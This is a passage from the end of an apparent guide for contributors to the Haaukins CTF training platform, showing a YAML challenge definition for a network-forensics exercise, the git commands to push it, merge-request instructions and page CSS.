<span id="cb17-21"><a href="#cb17-21" aria-hidden="true" tabindex="-1"></a>          After looking through the network traffic in `Breaking free traffing` you found some interesting credentials. Maybe you should see what the lead to.</span>
<span id="cb17-22"><a href="#cb17-22" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.gitlab.com/haaukins/games/aau/breaking-free:client</span><span class="co"> #client</span></span>
<span id="cb17-23"><a href="#cb17-23" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">flags</span><span class="kw">:</span></span>
<span id="cb17-24"><a href="#cb17-24" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">tag</span><span class="kw">:</span><span class="at"> breaking-free-1</span><span class="co"> # Challenge tag without prefix and with a number</span></span>
<span id="cb17-25"><a href="#cb17-25" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;Breaking free traffing&quot;</span><span class="co"> # Name participants sees</span></span>
<span id="cb17-26"><a href="#cb17-26" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">env</span><span class="kw">:</span><span class="at"> FLAG</span><span class="co"> # The environment varible your code reads the flag from</span></span>
<span id="cb17-27"><a href="#cb17-27" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">points</span><span class="kw">:</span><span class="at"> </span><span class="dv">15</span><span class="co"> # Point as described in the point section</span></span>
<span id="cb17-28"><a href="#cb17-28" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">category</span><span class="kw">:</span><span class="at"> Forensics</span><span class="co"> # Category of the challenge</span></span>
<span id="cb17-29"><a href="#cb17-29" aria-hidden="true" tabindex="-1"></a><span class="fu">        td</span><span class="kw">: </span><span class="ch">|</span><span class="co"> # Description that the participants sees ending with a download link</span></span>
<span id="cb17-30"><a href="#cb17-30" aria-hidden="true" tabindex="-1"></a>          Someone didn&#39;t understand to look for the small padlock in the address bar in the browser, try to see if you can find their credentials.</span></code></pre></div>
      <p>Now that we have created all the required files we can push the
      challenge to Gitlab and create a merge request</p>
      <div class="sourceCode" id="cb18"><pre
      class="sourceCode bash"><code class="sourceCode bash"><span id="cb18-1"><a href="#cb18-1" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> add .</span>
<span id="cb18-2"><a href="#cb18-2" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> commit <span class="at">-m</span> <span class="st">&quot;Finished my challenge&quot;</span> <span class="co">#Normally you would commit as you go :D</span></span>
<span id="cb18-3"><a href="#cb18-3" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> push origin development</span></code></pre></div>
      <p>Go to Gitlab and you should see a green button in the top of the
      frontpage saying “create merge request” press that at fill out the
      required information as seen on the picture below. Adding Márton Reiter
      or Thomas Mulvad as reviewers, they will most likely get back to you
      within 48 hours with feedback or merge it if it looks perfect. The merge
      will then trigger that it will be pushed into Haaukins.</p>
      <figure>
      <img src="./images/mr.png" alt="Merge Request" />
      <figcaption aria-hidden="true">Merge Request</figcaption>
      </figure>      

        </div>
        <style type='text/css'>body {
  font: 400 16px/1.5 "Helvetica Neue", Helvetica, Arial, sans-serif;
  color: #111;
  background-color: #fdfdfd;
  -webkit-text-size-adjust: 100%;
  -webkit-font-feature-settings: "kern" 1;
  -moz-font-feature-settings: "kern" 1;
  -o-font-feature-settings: "kern" 1;
  font-feature-settings: "kern" 1;
  font-kerning: normal;
  padding: 30px;
}

@media only screen and (max-width: 600px) {
  body {
    padding: 5px;
  }

  body > #content {
    padding: 0px 20px 20px 20px !important;
  }
}

body > #content {
  margin: 0px;
  max-width: 900px;
  border: 1px solid #e1e4e8;
  padding: 10px 40px;
  padding-bottom: 20px;
  border-radius: 2px;
  margin-left: auto;
  margin-right: auto;
}

hr {
  color: #bbb;
  background-color: #bbb;
  height: 1px;
  flex: 0 1 auto;
  margin: 1em 0;
  padding: 0;
  border: none;
}

/**
 * Links
 */
a {
  color: #0366d6;
  text-decoration: none; }
  a:visited {
    color: #0366d6; }
  a:hover {
    color: #0366d6;
    text-decoration: underline; }

pre {
  background-color: #f6f8fa;
  border-radius: 3px;
  font-size: 85%;
  line-height: 1.45;
  overflow: auto;
  padding: 16px;
}

/**
  * Code blocks
  */

code {
  background-color: rgba(27,31,35,.05);
  border-radius: 3px;
  font-size: 85%;
  margin: 0;
  word-wrap: break-word;
  padding: .2em .4em;
  font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
}

pre > code {
  background-color: transparent;
  border: 0;
  display: inline;
  line-height: inherit;
  margin: 0;
  overflow: visible;
  padding: 0;
  word-wrap: normal;
  font-size: 100%;
}


/**
 * Blockquotes
 */
blockquote {
  margin-left: 30px;
  margin-top: 0px;
  margin-bottom: 16px;
  border-left-width: 3px;
  padding: 0 1em;
  color: #828282;
  border-left: 4px solid #e8e8e8;
  padding-left: 15px;
  font-size: 18px;
  letter-spacing: -1px;
  font-style: italic;
}
blockquote * {
  font-style: normal !important;
  letter-spacing: 0;
  color: #6a737d !important;
}

/**
 * Tables
 */
table {
  border-spacing: 2px;
  display: block;
  font-size: 14px;
  overflow: auto;
  width: 100%;
  margin-bottom: 16px;
  border-spacing: 0;
  border-collapse: collapse;
}

td {
  padding: 6px 13px;
  border: 1px solid #dfe2e5;
}

th {
  font-weight: 600;
  padding: 6px 13px;
  border: 1px solid #dfe2e5;
}

tr {
  background-color: #fff;
  border-top: 1px solid #c6cbd1;
}

table tr:nth-child(2n) {
  background-color: #f6f8fa;
}

/**
 * Others
 */

img {
  max-width: 100%;
}

p {
  line-height: 24px;
  font-weight: 400;
  font-size: 16px;
  color: #24292e; }

ul {
  margin-top: 0; }

li {
  color: #24292e;
  font-size: 16px;
  font-weight: 400;
  line-height: 1.5; }

li + li {
  margin-top: 0.25em; }

* {
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
  color: #24292e; }

a:visited {
  color: #0366d6; }

h1, h2, h3 {
  border-bottom: 1px solid #eaecef;
  color: #111;
  /* Darker */ }</style>
      </body>
    </html>
